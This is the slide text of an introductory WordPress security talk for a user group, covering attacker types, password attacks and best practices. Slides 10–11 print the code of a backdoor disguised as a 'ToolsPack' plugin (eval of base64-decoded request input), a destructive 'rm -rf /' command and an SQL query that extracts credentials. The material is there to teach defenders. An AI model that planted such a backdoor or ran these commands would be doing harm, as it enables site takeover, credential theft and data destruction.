Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Intro to Wordpress Security


Published on

A brief overview of security concepts to give context to the threats facing Wordpress users.

Published in: Technology
  • Be the first to comment

  • Be the first to like this

Intro to Wordpress Security

  1. 1. Intro to WordpressSecurityPrepared for the Oklahoma City Wordpress User Groupby Chris Dodds
  2. 2. Chris Dodds Owner & Principal Advisor at Focusfire IT Strategy & Consulting Features: Ten+ years of experience across multiple industries and IT disciplines.Certifications:CISSP System Requirements: Food, water, &MCITP:SA internet connectivity.Security+Network+
  3. 3. This talk is not about thetop 5 WP security threats.
  4. 4. Let’s talk aboutBetty.
  5. 5. Betty’s Fancy Blog o’ GnomesBetty’s Betty’s Fancy Betty’s FancyFancy Server Employer Audience
  6. 6. It’s not about you, Betty.
  7. 7. The Players Script kiddies Hacktivists Pro Criminals Information Warriors
  8. 8. Enumeration AccessExploitation
  9. 9. Password AttacksExploit weak passwordsDictionary basedCan be entirely automated
  10. 10. ToolsPack Plugin toolspack.php <?php /* Plugin  Name:  ToolsPack Description:  Supercharge  your  WordPress  site  with  powerful  features   previously  only  available  to  users.  core  release.  Keep  the   plugin  updated! Version:  1.2 Author:  Mark  Stain Author  URI: */ $_REQUEST[e]  ?  EVAL(  base64_decode(  $_REQUEST[e]  )  )  :  exit; ?>Source -
  11. 11. This backdoor code allows theremote user to:Execute commands on you server$WINDIR ? `del /F/S/Q $WINDIR*` : `rm -rf /`;Execute commands against your WP databaseSELECT login + - + password FROM users
  12. 12. More Likely...Payload - keylogger, trojan, spyware, virusSEO Spam - links, keywords “garden gnomes, free chaps, leather sale, cheap sex, porn, prescription drugs, coupons, free avon”
  13. 13. Best Practices Update! Update! Update! Backup & test your backups. Use a unique passphrase. Don’t use the “admin” user. Disable or delete un-used plugins.
  14. 14. These are all things yourattacker will do once theycontrol your site.
  15. 15. Recommended PluginsBackupBackWPup - open-source or BackupBuddy - commercialSecurityBetter WP Security - open-sourceLimit Login Attempts - open-sourceSucuri SiteCheck Scanner -
  16. 16. Contact and Q&AChris Doddse-mail - chris.dodds@focusfire.nettwitter - @doddschrisweb -